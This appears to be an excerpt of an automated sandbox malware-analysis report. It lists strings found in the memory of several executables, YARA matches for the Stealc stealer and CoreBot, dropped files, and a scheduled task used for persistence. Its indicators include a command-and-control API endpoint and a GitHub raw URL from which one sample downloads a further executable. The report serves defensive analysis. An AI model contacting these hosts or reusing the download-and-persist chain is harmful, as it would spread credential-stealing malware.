Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com
Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.comd
Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2546675216.0000000005011000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2299017750.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298331003.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000014.00000002.2546675216.0000000005011000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: 5EfYBe3nch.exe, 00000000.00000003.1774329036.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1772058556.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lg
Source: 5EfYBe3nch.exe, 00000000.00000003.1771896524.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 5EfYBe3nch.exe, 00000000.00000003.1771896524.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: 5EfYBe3nch.exe, 00000000.00000003.1771896524.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                                      Source: powershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                      Source: powershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                      Source: powershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1789147203.00000000014AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1743404836.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1789147203.00000000014AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/5
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1789147203.00000000014AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/E
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/K
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/X
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1789101264.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1743404836.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1785065258.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1794078813.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1837153141.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api)
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1743404836.00000000014AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api92
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1789101264.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1794078813.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1837153141.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api;
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiM
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1789147203.00000000014AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/e
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726867792.000000000142D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api
                                      Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002C85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                                      Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe
                                      Source: eXbhgU9.exe, 00000011.00000000.2472309641.00000000008D2000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe-Downloading
                                      Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe...
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                                      Source: powershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                      Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                                      Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exe
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1731857588.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1759696015.0000000005D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1731946940.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731857588.0000000005C5F000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1742606605.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2074769455.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1731946940.0000000005C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1731946940.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731857588.0000000005C5F000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1742606605.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2074769455.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1731946940.0000000005C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1774329036.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1772058556.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1771896524.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007B4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007B4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/about/NQRAENMvsyyuOJH.exesvchost.exe
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007B4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.0000000000897000.00000040.00000001.01000000.00000006.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007B4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.0000000000897000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007B4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1759696015.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007B4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1759696015.0000000005D2C000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007B4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary

Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, type: UNPACKEDPE | Matched rule: Finds Stealc standalone samples (or dumps) based on the strings | Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe, type: DROPPED | Matched rule: Detects CoreBot | Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe, type: DROPPED | Matched rule: Detects CoreBot | Author: ditekSHen
Source: C:\Windows\System32\cmd.exe | File created: C:\Temp\random.hta
Source: 5EfYBe3nch.exe | Static PE information: section name:
Source: 5EfYBe3nch.exe | Static PE information: section name: .idata
Source: 5EfYBe3nch.exe | Static PE information: section name:
Source: DLTDCR8UJINP8YM8Y.exe.0.dr | Static PE information: section name:
Source: DLTDCR8UJINP8YM8Y.exe.0.dr | Static PE information: section name: .idata
Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.dr | Static PE information: section name:
Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.dr | Static PE information: section name: .idata
Source: GIIIIJDHJE.exe.2.dr | Static PE information: section name:
Source: GIIIIJDHJE.exe.2.dr | Static PE information: section name: .idata
Source: random[1].exe.2.dr | Static PE information: section name:
Source: random[1].exe.2.dr | Static PE information: section name: .idata
Source: skotes.exe.5.dr | Static PE information: section name:
Source: skotes.exe.5.dr | Static PE information: section name: .idata
Source: random[1].exe.15.dr | Static PE information: section name:
Source: random[1].exe.15.dr | Static PE information: section name: .idata
Source: random[1].exe.15.dr | Static PE information: section name:
Source: 36ac23ea9d.exe.15.dr | Static PE information: section name:
Source: 36ac23ea9d.exe.15.dr | Static PE information: section name: .idata
Source: 36ac23ea9d.exe.15.dr | Static PE information: section name:
Source: iSHmPkn[1].exe.15.dr | Static PE information: section name:
Source: iSHmPkn[1].exe.15.dr | Static PE information: section name: .idata
Source: iSHmPkn[1].exe.15.dr | Static PE information: section name:
Source: iSHmPkn.exe.15.dr | Static PE information: section name:
Source: iSHmPkn.exe.15.dr | Static PE information: section name: .idata
Source: iSHmPkn.exe.15.dr | Static PE information: section name:
Source: 483d2fa8a0d53818306efeb32d3.exe.34.dr | Static PE information: section name:
Source: 483d2fa8a0d53818306efeb32d3.exe.34.dr | Static PE information: section name: .idata
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: section name:
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: section name:
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: section name:
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: section name:
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: section name:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C5862C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy | 2_2_6C5862C0
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\Documents\GIIIIJDHJE.exe | File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\Documents\GIIIIJDHJE.exe | File deleted: C:\Windows\Tasks\skotes.job
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4882602_2_6C488260
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4CA2102_2_6C4CA210
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4D82202_2_6C4D8220
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C5862C02_2_6C5862C0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4D22A02_2_6C4D22A0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4CE2B02_2_6C4CE2B0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4083402_2_6C408340
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C5423702_2_6C542370
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4023702_2_6C402370
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C51C3602_2_6C51C360
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4963702_2_6C496370
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4723202_2_6C472320
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4543E02_2_6C4543E0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4323A02_2_6C4323A0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C45E3B02_2_6C45E3B0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C403C402_2_6C403C40
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C529C402_2_6C529C40
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C411C302_2_6C411C30
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C53DCD02_2_6C53DCD0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4C1CE02_2_6C4C1CE0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C463D002_2_6C463D00
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4D1DC02_2_6C4D1DC0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C3F3D802_2_6C3F3D80
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C549D902_2_6C549D90
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C55BE702_2_6C55BE70
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C585E602_2_6C585E60
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C50DE102_2_6C50DE10
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C423EC02_2_6C423EC0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C3F5F302_2_6C3F5F30
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C435F202_2_6C435F20
